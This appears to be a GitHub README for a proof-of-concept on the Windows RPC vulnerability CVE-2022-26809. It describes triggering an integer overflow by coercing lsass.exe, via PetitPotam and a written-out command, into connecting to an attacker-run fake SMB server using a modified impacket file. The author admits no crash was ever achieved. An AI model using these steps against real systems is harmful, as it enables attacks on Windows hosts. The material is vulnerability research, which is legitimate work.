CVE-2022-26809
This repo just simply research for the CVE, for more detailed ananlysis,please refer here. UPDATE:05/19 2022 This ananlyze hasn’t been finished yet….
UPDATE:05/22 2022 HuanGMz Post and corelight blog show the real vulnerable point:
OSF_CASSOCIATION::ProcessBindAckOrNak
This vulnerability is triggered like CVE-2021-43893, when send the ESFRPC request to lsass.exe with UNC path, victim will try to access target as client, so it will trigger interger overflow at client API
If have any better solution to trigger this vuln, feel free to submit issue or pr ๐
PoC-CVE-2022-26809
Because the vulnerability triggered like CVE-2021-43893, just clone the PetitPotam code.
Just prepare environment just like here:
- trigger: with PetitPotam
- victim: with Vulnerable rpcrt4.dll
- attacker: with attacker-server
- Run
fake_smb_server.pyat attacker-server aflter replacing the rpcrt.py wit origin one - trigger the victim to access attacker serve with
python petitpotam.py -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
- It will not cause BSOD usually, enable the page heap for
lsass.exe(However, I have not success triggered BSoD, but accroding the windbg, the interger overflow has been triggered)
Old Description
Here is reproduce code for Windows RPC Vuln CVE-2022-26809, and it refer https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/netds/rpc/hello.
PoC-OSF_SCALL::GetCoalescedBuffer
My python version is 3.6.7
Not sure if GetCoalescedBuffer will involve real CVE-2022-26809, just keep it
the poc.py just try to trigger the vuln functionOSF_SCALL::GetCoalescedBuffer, it wouldn’t cause any crash because dword integer overflow is too hard to reproduce.And the rpcrt.py is the python package impacket.dcerpc.v5.rpcrt๏ผjust replace it with origin to trigger vuln(Remember to backup the origin one ๐ I believe the rpcrt.py has a huge of bugs).
If it not work, maybe wireshark can help to locate the bug.
PipeDemo
if necessary, just use nmake to rebuild it
